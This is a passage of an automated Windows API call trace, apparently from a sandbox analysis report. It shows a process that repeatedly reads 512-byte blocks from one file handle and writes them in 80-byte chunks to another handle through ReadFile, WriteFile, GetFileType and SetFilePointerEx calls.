lpOverlapped=0x0 | out: lpBuffer=0x14ed9c*, lpNumberOfBytesWritten=0x14dda0*=0x20, lpOverlapped=0x0) returned 1 [0177.962] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.962] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14dd8c | out: lpNewFilePointer=0x0) returned 1 [0177.962] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.962] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.962] GetFileType (hFile=0x50) returned 0x1 [0177.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.962] GetFileType (hFile=0x50) returned 0x1 [0177.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.962] WriteFile (in: hFile=0x50, lpBuffer=0x14ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.963] GetFileType (hFile=0x50) returned 0x1 [0177.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.963] WriteFile (in: hFile=0x50, lpBuffer=0x14ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec0c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.963] GetFileType (hFile=0x50) returned 0x1 [0177.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.963] WriteFile (in: hFile=0x50, lpBuffer=0x14ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec5c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.963] GetFileType (hFile=0x50) returned 0x1 [0177.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.963] WriteFile (in: hFile=0x50, lpBuffer=0x14ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecac*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.963] GetFileType (hFile=0x50) returned 0x1 [0177.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.963] WriteFile (in: hFile=0x50, lpBuffer=0x14ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecfc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.963] GetFileType (hFile=0x50) returned 0x1 [0177.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.963] WriteFile (in: hFile=0x50, lpBuffer=0x14ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed4c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.963] GetFileType (hFile=0x50) returned 0x1 [0177.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.963] WriteFile (in: hFile=0x50, lpBuffer=0x14ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed9c*, lpNumberOfBytesWritten=0x14dda0*=0x20, lpOverlapped=0x0) returned 1 [0177.963] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.963] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14dd8c | out: lpNewFilePointer=0x0) returned 1 [0177.963] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.963] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.963] GetFileType (hFile=0x50) returned 0x1 [0177.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.963] GetFileType (hFile=0x50) returned 0x1 [0177.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.963] WriteFile (in: hFile=0x50, lpBuffer=0x14ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.964] GetFileType (hFile=0x50) returned 0x1 [0177.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.964] WriteFile (in: hFile=0x50, lpBuffer=0x14ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec0c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.964] GetFileType (hFile=0x50) returned 0x1 [0177.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.964] WriteFile (in: hFile=0x50, lpBuffer=0x14ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec5c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.964] GetFileType (hFile=0x50) returned 0x1 [0177.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.964] WriteFile (in: hFile=0x50, lpBuffer=0x14ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecac*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.964] GetFileType (hFile=0x50) returned 0x1 [0177.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.964] WriteFile (in: hFile=0x50, lpBuffer=0x14ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecfc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.964] GetFileType (hFile=0x50) returned 0x1 [0177.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.964] WriteFile (in: hFile=0x50, lpBuffer=0x14ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed4c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.964] GetFileType (hFile=0x50) returned 0x1 [0177.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.964] WriteFile (in: hFile=0x50, lpBuffer=0x14ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed9c*, lpNumberOfBytesWritten=0x14dda0*=0x20, lpOverlapped=0x0) returned 1 [0177.964] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.964] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14dd8c | out: lpNewFilePointer=0x0) returned 1 [0177.964] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.964] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.964] GetFileType (hFile=0x50) returned 0x1 [0177.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.965] GetFileType (hFile=0x50) returned 0x1 [0177.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.965] WriteFile (in: hFile=0x50, lpBuffer=0x14ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.965] GetFileType (hFile=0x50) returned 0x1 [0177.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.965] WriteFile (in: hFile=0x50, lpBuffer=0x14ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec0c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.965] GetFileType (hFile=0x50) returned 0x1 [0177.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.965] WriteFile (in: hFile=0x50, lpBuffer=0x14ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec5c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.965] GetFileType (hFile=0x50) returned 0x1 [0177.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.965] WriteFile (in: hFile=0x50, lpBuffer=0x14ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecac*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.965] GetFileType (hFile=0x50) returned 0x1 [0177.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.965] WriteFile (in: hFile=0x50, lpBuffer=0x14ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecfc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.965] GetFileType (hFile=0x50) returned 0x1 [0177.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.965] WriteFile (in: hFile=0x50, lpBuffer=0x14ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed4c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.965] GetFileType (hFile=0x50) returned 0x1 [0177.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.965] WriteFile (in: hFile=0x50, lpBuffer=0x14ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed9c*, lpNumberOfBytesWritten=0x14dda0*=0x20, lpOverlapped=0x0) returned 1 [0177.965] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.965] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14dd8c | out: lpNewFilePointer=0x0) returned 1 [0177.965] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.965] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.965] GetFileType (hFile=0x50) returned 0x1 [0177.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.966] GetFileType (hFile=0x50) returned 0x1 [0177.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.966] WriteFile (in: hFile=0x50, lpBuffer=0x14ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.966] GetFileType (hFile=0x50) returned 0x1 [0177.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.966] WriteFile (in: hFile=0x50, lpBuffer=0x14ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec0c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.966] GetFileType (hFile=0x50) returned 0x1 [0177.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.966] WriteFile (in: hFile=0x50, lpBuffer=0x14ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec5c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.966] GetFileType (hFile=0x50) returned 0x1 [0177.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.966] WriteFile (in: hFile=0x50, lpBuffer=0x14ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecac*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.966] GetFileType (hFile=0x50) returned 0x1 [0177.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.966] WriteFile (in: hFile=0x50, lpBuffer=0x14ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecfc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.966] GetFileType (hFile=0x50) returned 0x1 [0177.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.966] WriteFile (in: hFile=0x50, lpBuffer=0x14ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed4c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.966] GetFileType (hFile=0x50) returned 0x1 [0177.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.966] WriteFile (in: hFile=0x50, lpBuffer=0x14ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed9c*, lpNumberOfBytesWritten=0x14dda0*=0x20, lpOverlapped=0x0) returned 1 [0177.966] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.966] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14dd8c | out: lpNewFilePointer=0x0) returned 1 [0177.966] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.966] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.967] GetFileType (hFile=0x50) returned 0x1 [0177.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.967] GetFileType (hFile=0x50) returned 0x1 [0177.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.967] WriteFile (in: hFile=0x50, lpBuffer=0x14ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.967] GetFileType (hFile=0x50) returned 0x1 [0177.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.967] WriteFile (in: hFile=0x50, lpBuffer=0x14ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec0c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.967] GetFileType (hFile=0x50) returned 0x1 [0177.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.967] WriteFile (in: hFile=0x50, lpBuffer=0x14ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec5c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.967] GetFileType (hFile=0x50) returned 0x1 [0177.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.967] WriteFile (in: hFile=0x50, lpBuffer=0x14ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecac*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.967] GetFileType (hFile=0x50) returned 0x1 [0177.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.967] WriteFile (in: hFile=0x50, lpBuffer=0x14ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecfc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.967] GetFileType (hFile=0x50) returned 0x1 [0177.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.967] WriteFile (in: hFile=0x50, lpBuffer=0x14ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed4c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.967] GetFileType (hFile=0x50) returned 0x1 [0177.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.967] WriteFile (in: hFile=0x50, lpBuffer=0x14ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed9c*, lpNumberOfBytesWritten=0x14dda0*=0x20, lpOverlapped=0x0) returned 1 [0177.967] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.967] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14dd8c | out: lpNewFilePointer=0x0) returned 1 [0177.967] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.967] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.968] GetFileType (hFile=0x50) returned 0x1 [0177.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.968] GetFileType (hFile=0x50) returned 0x1 [0177.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.968] WriteFile (in: hFile=0x50, lpBuffer=0x14ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.968] GetFileType (hFile=0x50) returned 0x1 [0177.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.968] WriteFile (in: hFile=0x50, lpBuffer=0x14ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec0c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.968] GetFileType (hFile=0x50) returned 0x1 [0177.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.968] WriteFile (in: hFile=0x50, lpBuffer=0x14ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec5c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.968] GetFileType (hFile=0x50) returned 0x1 [0177.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.968] WriteFile (in: hFile=0x50, lpBuffer=0x14ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecac*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.968] GetFileType (hFile=0x50) returned 0x1 [0177.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.968] WriteFile (in: hFile=0x50, lpBuffer=0x14ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecfc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.968] GetFileType (hFile=0x50) returned 0x1 [0177.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.968] WriteFile (in: hFile=0x50, lpBuffer=0x14ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed4c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.968] GetFileType (hFile=0x50) returned 0x1 [0177.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.968] WriteFile (in: hFile=0x50, lpBuffer=0x14ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed9c*, lpNumberOfBytesWritten=0x14dda0*=0x20, lpOverlapped=0x0) returned 1 [0177.968] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.968] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14dd8c | out: lpNewFilePointer=0x0) returned 1 [0177.968] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.968] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.969] GetFileType (hFile=0x50) returned 0x1 [0177.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.969] GetFileType (hFile=0x50) returned 0x1 [0177.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.969] WriteFile (in: hFile=0x50, lpBuffer=0x14ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.969] GetFileType (hFile=0x50) returned 0x1 [0177.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.969] WriteFile (in: hFile=0x50, lpBuffer=0x14ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec0c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.969] GetFileType (hFile=0x50) returned 0x1 [0177.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.969] WriteFile (in: hFile=0x50, lpBuffer=0x14ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec5c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.969] GetFileType (hFile=0x50) returned 0x1 [0177.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.969] WriteFile (in: hFile=0x50, lpBuffer=0x14ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecac*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.969] GetFileType (hFile=0x50) returned 0x1 [0177.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.969] WriteFile (in: hFile=0x50, lpBuffer=0x14ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecfc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.969] GetFileType (hFile=0x50) returned 0x1 [0177.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.969] WriteFile (in: hFile=0x50, lpBuffer=0x14ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed4c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.969] GetFileType (hFile=0x50) returned 0x1 [0177.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.969] WriteFile (in: hFile=0x50, lpBuffer=0x14ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed9c*, lpNumberOfBytesWritten=0x14dda0*=0x20, lpOverlapped=0x0) returned 1 [0177.969] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.969] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14dd8c | out: lpNewFilePointer=0x0) returned 1 [0177.969] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.969] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.970] GetFileType (hFile=0x50) returned 0x1 [0177.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.970] GetFileType (hFile=0x50) returned 0x1 [0177.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.970] WriteFile (in: hFile=0x50, lpBuffer=0x14ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.970] GetFileType (hFile=0x50) returned 0x1 [0177.970] _get_osfhandle 